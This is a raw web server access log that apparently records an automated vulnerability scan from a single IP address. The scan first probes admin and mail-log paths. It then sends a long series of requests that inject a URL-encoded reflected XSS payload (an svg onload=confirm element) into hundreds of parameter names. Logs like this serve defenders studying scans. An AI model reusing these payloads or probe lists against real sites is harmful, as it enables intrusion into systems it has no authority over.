195.164.49.69 - - [20/Oct/2024:17:59:48 +0000] POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:17:59:50 +0000] POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1 404 1139
195.164.49.69 - - [20/Oct/2024:17:59:52 +0000] GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1 404 1144
195.164.49.69 - - [20/Oct/2024:17:59:55 +0000] POST /apps/zxtm/wizard.fcgi?error=1§ion=Access+Management%3ALocalUsers HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:00:02 +0000] GET /logs/errors HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:18:00:05 +0000] GET /roundcube/logs/sendmail HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:18:00:05 +0000] GET /roundcube/logs/sendmail.log HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:18:00:06 +0000] GET /roundcube/logs/errors.log HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:18:00:06 +0000] GET /roundcube/logs/errors HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:00:06 +0000] GET /webmail/logs/sendmail HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:00:06 +0000] GET /webmail/logs/sendmail.log HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:18:00:06 +0000] GET /webmail/logs/errors.log HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:18:00:06 +0000] GET /webmail/logs/errors HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:18:00:06 +0000] GET /mail/logs/sendmail HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:18:00:07 +0000] GET /mail/logs/sendmail.log HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:00:07 +0000] GET /mail/logs/errors.log HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:18:00:07 +0000] GET /mail/logs/errors HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:18:00:07 +0000] GET /logs/sendmail HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:18:00:07 +0000] GET /logs/sendmail.log HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:00:07 +0000] GET /logs/errors.log HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:00:28 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:00:43 +0000] GET /?rememberme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rememberme%27%29%3E&module=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-module%27%29%3E&comment_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_ID%27%29%3E&client_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-client_id%27%29%3E&noheader=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noheader%27%29%3E&del=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-del%27%29%3E&media=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-media%27%29%3E&user_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_name%27%29%3E&country=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-country%27%29%3E&phone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-phone%27%29%3E&sidebar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sidebar%27%29%3E&version=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-version%27%29%3E&widget_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget_id%27%29%3E&class=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-class%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:00:44 +0000] GET /?redirect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect%27%29%3E&linkcheck=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-linkcheck%27%29%3E&port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-port%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-password%27%29%3E&target=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-target%27%29%3E&method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-method%27%29%3E¬e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-note%27%29%3E&amount=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-amount%27%29%3E&set=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-set%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-q%27%29%3E&select=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-select%27%29%3E&cid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cid%27%29%3E&tag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keyword%27%29%3E HTTP/1.1 200 11204
83.212.98.101 - - [20/Oct/2024:18:00:44 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:18:00:45 +0000] GET /?title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:00:47 +0000] GET /?u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:00:53 +0000] GET /?edit-menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit-menu-item%27%29%3E&error=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-error%27%29%3E&post_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_title%27%29%3E&x=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-x%27%29%3E&down=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-down%27%29%3E&state=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-state%27%29%3E&data=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-data%27%29%3E&auth=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-auth%27%29%3E&themes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-themes%27%29%3E&captcha=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-captcha%27%29%3E&nickname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nickname%27%29%3E&allusers=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-allusers%27%29%3E&color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-color%27%29%3E&path=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-path%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:00:57 +0000] GET /?uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27%29%3E&command=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-command%27%29%3E&reverse=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reverse%27%29%3E&cancel=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cancel%27%29%3E&h=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-h%27%29%3E&logout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-logout%27%29%3E§ion=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-section%27%29%3E&gid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gid%27%29%3E&input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-input%27%29%3E&post_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_type%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page%27%29%3E&updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-updated%27%29%3E&charset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-charset%27%29%3E&v=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-v%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:00:57 +0000] GET /?t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:00:58 +0000] GET /?activated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activated%27%29%3E&trigger=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trigger%27%29%3E&loggedout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-loggedout%27%29%3E&script=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-script%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-query%27%29%3E&file_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file_name%27%29%3E&fname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fname%27%29%3E&options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-options%27%29%3E&export=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-export%27%29%3E&post=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-p%27%29%3E&action2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action2%27%29%3E&c=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-c%27%29%3E&destination=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-destination%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:06 +0000] GET /?send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:07 +0000] GET /?taxonomy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-taxonomy%27%29%3E&tables=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tables%27%29%3E&confirm=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-confirm%27%29%3E&db_port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_port%27%29%3E&op=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-op%27%29%3E&untrashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-untrashed%27%29%3E&tid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tid%27%29%3E&flag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-flag%27%29%3E&stylesheet=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stylesheet%27%29%3E&download=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-download%27%29%3E&comment_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_status%27%29%3E&_wpnonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wpnonce%27%29%3E&metakeyinput=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyinput%27%29%3E&remove=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-remove%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:07 +0000] GET /?tab=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tab%27%29%3E&domain=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-domain%27%29%3E&show=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show%27%29%3E&submit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-submit%27%29%3E&move=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-move%27%29%3E&userid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-userid%27%29%3E&oitar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oitar%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-key%27%29%3E&description=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-description%27%29%3E&user=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user%27%29%3E&active=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-active%27%29%3E&clone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-clone%27%29%3E&success=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-success%27%29%3E&slug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-slug%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:09 +0000] GET /?attachment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment%27%29%3E&dbname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dbname%27%29%3E&rows=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rows%27%29%3E&parent_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent_id%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lang%27%29%3E&fid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fid%27%29%3E&text=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text%27%29%3E&link=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link%27%29%3E&timeout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timeout%27%29%3E&db_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_name%27%29%3E&ids=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ids%27%29%3E&w=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-w%27%29%3E&provider=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-provider%27%29%3E&plugin_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin_status%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:09 +0000] GET /?next=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-next%27%29%3E&preview=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview%27%29%3E&shortcode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-shortcode%27%29%3E&features=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-features%27%29%3E&mode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mode%27%29%3E&out_trade_no=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-out_trade_no%27%29%3E&category=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category%27%29%3E&replytocom=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-replytocom%27%29%3E&from=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-from%27%29%3E&start=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start%27%29%3E&value=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-value%27%29%3E&range=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-range%27%29%3E&table=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-table%27%29%3E&limit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-limit%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:09 +0000] GET /?callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-callback%27%29%3E&weblog_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-weblog_title%27%29%3E&check=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-check%27%29%3E&overwrite=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-overwrite%27%29%3E&prefix=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-prefix%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-l%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-token%27%29%3E&start_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start_date%27%29%3E&direction=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-direction%27%29%3E&ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ID%27%29%3E&pid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pid%27%29%3E&to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-to%27%29%3E&checkemail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checkemail%27%29%3E&menu-locations=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-locations%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:09 +0000] GET /?name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-name%27%29%3E&json=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-json%27%29%3E&id_base=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id_base%27%29%3E&where=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-where%27%29%3E&request=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-request%27%29%3E¬es=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-notes%27%29%3E&img=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-img%27%29%3E&a=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-a%27%29%3E&menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-item%27%29%3E&xml=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-xml%27%29%3E&columns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-columns%27%29%3E&service=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-service%27%29%3E&site_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site_id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:09 +0000] GET /?tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:09 +0000] GET /?order_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order_id%27%29%3E&cookie=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cookie%27%29%3E&debug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-debug%27%29%3E&m=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-m%27%29%3E&dir=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dir%27%29%3E&new_role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new_role%27%29%3E&trashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trashed%27%29%3E&log=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-log%27%29%3E&excerpt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-excerpt%27%29%3E&settings-updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings-updated%27%29%3E&plugins=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugins%27%29%3E&modify=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-modify%27%29%3E&pwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pwd%27%29%3E&file=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:09 +0000] GET /?i=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-i%27%29%3E&database=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-database%27%29%3E&tax_input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax_input%27%29%3E&secret=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-secret%27%29%3E&mod=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mod%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-s%27%29%3E&stage=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stage%27%29%3E&time=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-time%27%29%3E&new=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-api_key%27%29%3E&invalid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-invalid%27%29%3E&db=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db%27%29%3E&upload=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-upload%27%29%3E&tablename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tablename%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:09 +0000] GET /?subject=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-subject%27%29%3E&sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sticky%27%29%3E&ns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ns%27%29%3E&history=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-history%27%29%3E&category_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category_id%27%29%3E&metakeyselect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyselect%27%29%3E©=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-copy%27%29%3E&product_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-product_id%27%29%3E&status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-status%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cat%27%29%3E&list=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-list%27%29%3E&val=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-val%27%29%3E&what=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-what%27%29%3E&group_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group_id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:10 +0000] GET /?up=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-up%27%29%3E&body=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-body%27%29%3E&return=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-return%27%29%3E&end=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end%27%29%3E&n=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-n%27%29%3E&opt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-opt%27%29%3E&source=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-source%27%29%3E&y=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-y%27%29%3E&parent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent%27%29%3E&reason=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reason%27%29%3E&meta=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-meta%27%29%3E&pass1=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass1%27%29%3E&blog=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog%27%29%3E&plugin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:10 +0000] GET /?sort=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sort%27%29%3E&msg=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-msg%27%29%3E&hostname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hostname%27%29%3E&directory=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-directory%27%29%3E&disabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-disabled%27%29%3E&last_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-last_name%27%29%3E&oauth_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_token%27%29%3E&first_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-first_name%27%29%3E&delete_widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete_widget%27%29%3E&md5=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-md5%27%29%3E&selection=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-selection%27%29%3E&filename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filename%27%29%3E&address=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-address%27%29%3E HTTP/1.1 200 11204
